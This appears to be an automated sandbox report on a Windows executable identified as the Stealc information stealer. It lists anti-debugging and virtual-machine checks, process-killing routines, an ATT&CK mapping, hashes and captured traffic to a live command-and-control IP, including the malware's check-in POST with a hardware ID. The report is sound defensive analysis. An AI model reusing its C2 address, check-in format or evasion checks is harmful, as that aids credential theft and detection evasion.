              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009B16A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_009D1BF0
              Source: file.exe, file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1351848119.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1351848119.0000000001126000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25958
              Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25811
              Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25965
              Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25854
              Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25830
              Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe File opened: SICE
              Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B4A60 VirtualProtect 00000000,00000004,00000100,? 0_2_009B4A60
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009D6390
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D6390 mov eax, dword ptr fs:[00000030h] 0_2_009D6390
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D2AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009D2AD0
              Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match, File source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009D46A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_009D4610
              Source: file.exe, file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009D2D60
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_009D1B20
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009D2A40
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009D2C10

              Stealing of Sensitive Information

              Source: Yara match, File source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Source: Yara match, File source: dump.pcap, type: PCAP

              Remote Access Functionality

              Source: Yara match, File source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Source: Yara match, File source: dump.pcap, type: PCAP

              MITRE ATT&CK matrix (tactic columns, flattened by extraction): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.php?= | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpS= | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php_= | 100% | Avira URL Cloud | malware
http://185.215.113.206qM | 0% | Avira URL Cloud | safe
http://185.215.113.206/c4becf79229cb002.phpK= | 100% | Avira URL Cloud | malware
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | false | | high
http://185.215.113.206/c4becf79229cb002.php | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/q | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php?= | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php_= | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpS= | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/B | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpK= | file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phps | file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206qM | file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561486
                              Start date and time:2024-11-23 14:46:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 13s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 126
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                              No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947067089957022
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'787'392 bytes
                              MD5:0537afac70b6fbc5a47749caf7565b78
                              SHA1:8ec7e7c48823c50e4c4ee6b6cd5c007ef964cad8
                              SHA256:cc1ee7d61921fed5338f55fc6e9a0661cb78fb562e54280aec23be3adca5e73a
                              SHA512:46ed5fb954dfc82e3fcd6f383c25fd00426bbecd74741f1ee9372fa14918f7e98df66bedea7c7bcccbbad49d271c1f0b1453702d0fc5b93343661589e408e89a
                              SSDEEP:49152:JkdEavK+krwYpd8pjbfdGKG0R3KAGuR/pe:6dEwoyFbfIKJR3Kmpe
                              TLSH:FE85336C7BB3A6C4CB65B2B37C9E557035F01A32C2179B7676073271A88BD02BC87529
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa8c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction preview:
jmp 00007F99A0EC00FAh
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | ff7365a02014434647a8680df189ff4c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 60d4d22fda84ac7f44237f9bcf19e7b4 | False | 0.796875 | data | 5.985954989706685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a4000 | 0x200 | 19905168d5807e1708e69a9d5eb2c143 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lfcefhqr | 0x4f0000 | 0x19b000 | 0x19a800 | 58b6d75a1e730a39533e50850581f776 | False | 0.9947995965286236 | data | 7.955184799443045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
phkznexg | 0x68b000 | 0x1000 | 0x400 | a748ff23e53de737c7e80491faa7aa09 | False | 0.7509765625 | data | 6.021106902035921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68c000 | 0x3000 | 0x2200 | ec0a4b666dd863c7a2acc81aef5ea47a | False | 0.06996783088235294 | DOS executable (COM) | 0.7773783630874334 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x68a4f4 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T14:47:16.566594+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 14:47:14.498503923 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:14.622200966 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Nov 23, 2024 14:47:14.622581005 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:14.623301029 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:14.749747992 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Nov 23, 2024 14:47:16.068548918 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Nov 23, 2024 14:47:16.068670988 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:16.098375082 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:16.218127012 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Nov 23, 2024 14:47:16.566523075 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Nov 23, 2024 14:47:16.566593885 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Nov 23, 2024 14:47:19.342802048 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
                              • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | 7404 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 14:47:14.623301029 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Nov 23, 2024 14:47:16.068548918 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 13:47:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Nov 23, 2024 14:47:16.098375082 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a
Data Ascii:
------BKEHDGDGHCBGCAKFIIIE
Content-Disposition: form-data; name="hwid"

6137C250D41F1622379703
------BKEHDGDGHCBGCAKFIIIE
Content-Disposition: form-data; name="build"

mars
------BKEHDGDGHCBGCAKFIIIE--
Nov 23, 2024 14:47:16.566523075 CET | 210 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 13:47:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                              Target ID:0
                              Start time:08:47:10
                              Start date:23/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x9b0000
                              File size:1'787'392 bytes
                              MD5 hash:0537AFAC70B6FBC5A47749CAF7565B78
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:4.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.7%
                                Total number of Nodes:1361
                                Total number of Limit Nodes:28
26186 9d1855 lstrlen 26184->26186 26185->26186 26187 9d1873 26186->26187 26188 9d1885 lstrcpy lstrcat 26187->26188 26189 9d1898 26187->26189 26188->26189 26190 9d18c7 26189->26190 26191 9d18bf lstrcpy 26189->26191 26192 9d18ce lstrlen 26190->26192 26191->26190 26193 9d18e6 26192->26193 26194 9d18f2 lstrcpy lstrcat 26193->26194 26195 9d1906 26193->26195 26194->26195 26196 9d1935 26195->26196 26197 9d192d lstrcpy 26195->26197 26198 9d193c lstrlen 26196->26198 26197->26196 26199 9d1958 26198->26199 26200 9d196a lstrcpy lstrcat 26199->26200 26201 9d197d 26199->26201 26200->26201 26202 9d19ac 26201->26202 26203 9d19a4 lstrcpy 26201->26203 26204 9d19b3 lstrlen 26202->26204 26203->26202 26205 9d19cb 26204->26205 26206 9d19d7 lstrcpy lstrcat 26205->26206 26207 9d19eb 26205->26207 26206->26207 26208 9d1a1a 26207->26208 26209 9d1a12 lstrcpy 26207->26209 26210 9d1a21 lstrlen 26208->26210 26209->26208 26211 9d1a3d 26210->26211 26212 9d1a4f lstrcpy lstrcat 26211->26212 26213 9d1a62 26211->26213 26212->26213 26214 9d1a91 26213->26214 26215 9d1a89 lstrcpy 26213->26215 26216 9d1a98 lstrlen 26214->26216 26215->26214 26217 9d1ab4 26216->26217 26218 9d1ac6 lstrcpy lstrcat 26217->26218 26219 9d1ad9 26217->26219 26218->26219 26220 9d1b08 26219->26220 26221 9d1b00 lstrcpy 26219->26221 26220->25973 26221->26220 26223 9b2a24 SystemTimeToFileTime SystemTimeToFileTime 26222->26223 26223->25976 26223->25977 26225 9d157f 26224->26225 26226 9d159f lstrcpy 26225->26226 26227 9d15a7 26225->26227 26226->26227 26228 9d15d7 lstrcpy 